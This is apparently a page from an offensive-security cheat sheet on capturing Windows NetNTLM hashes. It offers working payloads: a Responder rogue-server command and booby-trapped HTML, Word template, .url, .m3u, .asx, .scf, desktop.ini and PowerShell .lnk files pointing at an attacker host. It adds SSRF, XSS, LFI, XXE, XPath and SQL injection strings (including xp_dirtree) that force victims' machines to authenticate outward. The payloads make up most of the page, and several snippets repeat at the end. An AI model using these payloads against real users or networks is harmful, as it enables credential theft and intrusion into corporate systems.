Stealing NTLM hashes

Stealing netNTLM hashes in windows

Windows has feature called SSO(single sign on) where an employee needs to provide his/her credentials only once, after that whenever the user has to access other resources in the network they won't have to login using their credentials again and again instead their ntlm hash is sent to the resource server they are trying to access and the resource server verifies the hash and grants them access. However there exists a design flaw in this implementation if a user's computer tries to visit any malicious server their ntlm hash will be sent to that server for authentication in this case red teamers and attackers can easily create a malicious server of their own and find ways for victim's computer to visit their server then the victim computer will send their ntlm hash in order to authenticate since the malicious server is controlled by the attacker they can grab the ntlm hash and crack it but it cannot be used for pass the hash attacks unlike pure ntlm hash but pretty neat overall. We can use responder which creates a rouge smb server.

Create a rouge smb server on attacker's machine.

sudo responder -I tun0

Exploitation techniques for victim to visit our server

CVE-2023-23397 Outlook NTLM Leak

1) Internet explorer and Microsoft edge

<!DOCTYPE html>
<html>
	<img src="file://<responder-ip>/test.png"/>
</html>

2) Office files

A word document can contain a link to template file located on the attacker's rogue share. Download a word document unzip it and edit word\_rels\settings.xml.rels Edit the Target attribute pointing to attacker's share rezip the word file and send to victim.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
	<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file://<responder-ip>/Template.dotx" TargetMode="External"/>
</Relationships>

3) URL handlers

<!DOCTYPE html>
<html>
	<script>
		location.href = 'ms-word:ofe|u|\\<responder-ip>\hello.docx';
	</script>
</html>

4) Internet shortcuts

Windows has special .url filetype that can be used to create shortcut to web pages. Save these as anything.url file.

[InternetShortcut]
URL=file://<responder-ip>/leak.html

5) Windows Media player .m3u and .asx files

anything.m3u

#EXTM3U
#EXTINF:1337, Leak
\\<responder-ip>\leak.mp3

anything.asx

<asx version="3.0">
	<title>Leak</title>
	<entry>
		<title></title>
		<ref href="file://<responder-ip>/leak.wma"/>
	</entry>
</asx>

6) Shell command files(.scf)(May not work on latest windows)

For this the victim doesn't have to open the file, if the victim just visits the folder where this file is stored explorer will automatically try to resolve the network path for the icon. Placing malicious.scf file in desktop folder of victim and when the victim logs in his ntlm hash is sent to us.

[Shell]
Command=2
IconFile=\\responder-ip\ordinary.ico
[Taskbar]
Command=ToggleDesktop

7) Desktop.ini(May not work on latest windows)

The desktop.ini file contains the information of the icons you have applied to the folder. Just like .scf file the victim doesn't have to open the desktop.ini file but just has to open the folder containing malicious desktop.ini file and the hash will be sent to attacker's server, placing this file inside desktop may be a trick just as .scf files

mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\responder-ip\aa >> desktop.ini
attrib +s +h desktop.ini

8) Shortcut Files (.lnk)

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "I will Steal your Hashes"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Conclusion, there are hundreds of more and undiscovered ways of stealing ntlm hashes.Basically anything that allows files to load via UNC path can be abused. https://github.com/Greenwolf/ntlm_theft this tool will create several documents and files for ntlm stealing.

python3 ntlm_theft.py -g all -s <responder-ip> -f folder_to_create_files_inside

Leveraging Web application vulnerabilities to steal ntlm hashes

SSRF to stealing netntlm hash

If the web application of intranet network is vulnerable to ssrf we can make request to our attacker's responder server.

http://corp.local/?url=http://<responder-ip>

In the background:

The Windows API will send an HTTP request
The server (in this case, Responder) will send the header WWW-Authenticate: NTLM prompting it to authenticate with NTLM
The client (in this case, the vulnerable application running in the server) will respond to the challenge and the attacker will grab the server's Net-NTLM hash

XSS to stealing netntlm hash

Usually if the responder server is inside the intranet network one can simple create an html page and set any element example img, iframe, audio, input, script src to attacker's responder server and when the employee visits our page via social engineering tricks we can steal their ntlm hash.

<!DOCTYPE html>
<html>
<head>
<title>Hello corp</title>
</head>

<body>
	<audio src=http://responder-ip/test.mp3 controls>
		hello audio
	</audio>
</body>

</html>

LFI to stealing ntlm hashes

If the web application running php is vunerable to lfi the include() method will resolve the UNC path.

http://corp.internal/index.php?page=//responder-ip/@alex

XXE to stealing ntlm hashes

If the web application is vulnerable to XXE and running php php://filter/convert.base64-encode/resource= can be used to resolve UNC path

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//responder-ip/@alex" >
]>
<root>
  <name></name>
  <tel></tel>
  <email>&xxe;</email>
  <password></password>
</root>

Xpath injection to stealing ntlm hashes

The doc() method can be used in out of band xpath injection to steal ntlm hashes

http://corp.local/?title=Foundation&type=*&rent_days=* and doc('//responder-ip/@alex')

Sql injection to stealing ntlm hashes(Mysql)

http://corp.local/index.php?id=1' union select 1,2,load_file('\\\\<responder-ip>\\@alex'),4;%00

Sql injection to stealing ntlm hashes(MSsql)

Stacked queries are supported, stored procedures can be called

';declare @q varchar(99);set @q='\\<responder-ip>\test'; exec master.dbo.xp_dirtree @q

PreviousLinux Privilege Escalation NextTricks and Tips

Last updated 1 year ago

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file://<responder-ip>/Template.dotx" TargetMode="External"/> </Relationships>

$objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("StealMyHashes.lnk") $lnk.TargetPath = "\\35.164.153.224\@OsandaMalith" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "I will Steal your Hashes" $lnk.HotKey = "Ctrl+Alt+O" $lnk.Save()

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//responder-ip/@alex" > ]> <root> <name></name> <tel></tel> <email>&xxe;</email> <password></password> </root>